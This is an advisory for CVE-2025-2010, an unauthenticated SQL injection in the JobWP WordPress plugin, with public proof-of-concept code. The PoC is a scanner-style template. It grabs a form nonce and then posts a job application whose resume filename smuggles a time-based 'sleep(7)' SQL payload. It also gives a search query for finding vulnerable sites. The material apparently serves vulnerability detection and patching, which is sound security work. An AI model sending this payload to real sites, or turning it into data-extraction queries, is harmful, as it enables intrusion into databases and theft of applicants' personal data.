The JobWP - Job Board, Job Listing, Career Page and Recruitment Plugin plugin for WordPress is vulnerable to SQL Injection via the 'jobwp_upload_resume' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
PoC代码[已公开]
id: CVE-2025-2010
info:
name: WordPress JobWP Plugin <= 2.3.9 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The JobWP - Job Board, Job Listing, Career Page and Recruitment Plugin plugin for WordPress is vulnerable to SQL Injection via the 'jobwp_upload_resume' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
impact: |
Successful exploitation could allow an attacker to execute arbitrary SQL queries, potentially leading to data exfiltration, privilege escalation, or other malicious activities.
remediation: |
Update the JobWP Plugin to version later than 2.3.9. Alternatively, implement proper input validation and sanitization controls.
reference:
- https://wpscan.com/vulnerability/26713902-26d8-47e3-b651-fe30d9898270/
- https://nvd.nist.gov/vuln/detail/CVE-2025-2010
classification:
epss-score: 0.1624
epss-percentile: 0.94588
cve-id: CVE-2025-2010
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
product: jobwp
fofa-query: body="/wp-content/plugins/jobwp"
tags: cve,cve2025,wp,wordpress,wp-plugin,sqli,jobwp
flow: http(1) && http(2)
variables:
jobid: "{{jobid}}"
http:
- raw:
- |
GET /jobs/{{jobid}}/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: nonce
group: 1
regex:
- 'jobwp_apply_form_nonce_field" value="([a-z0-9]+)"'
internal: true
- raw:
- |
@timeout: 30s
POST /jobs/{{jobid}}/ HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEUzdqU65JI5EA04B
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_apply_form_nonce_field"
{{nonce}}
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="x"
/jobs/{{jobid}}/
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_apply_for"
x
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_full_name"
x
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_email"
x@x.com
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_cover_letter"
x
------WebKitFormBoundaryEUzdqU65JI5EA04B
Content-Disposition: form-data; name="jobwp_upload_resume"; filename="xxxxxx\"*sleep(7)*\".pdf"
Content-Type: application/pdf
x
------WebKitFormBoundaryEUzdqU65JI5EA04B--
matchers:
- type: dsl
dsl:
- 'duration>=7'
- "status_code == 200"
- "contains_all(body, 'jobwp-', 'apply-')"
condition: and
# digest: 4a0a00473045022100aade06a714edd6142f8a61183c4fb3586dcd302587b7c8a3a0d6b25d24e11f1d0220591da1dd057f72e0ef8bd70f3a205f3fd992b7a1a82f8606f8bfccaf46878812:922c64590222798bb761d5b6d8e72950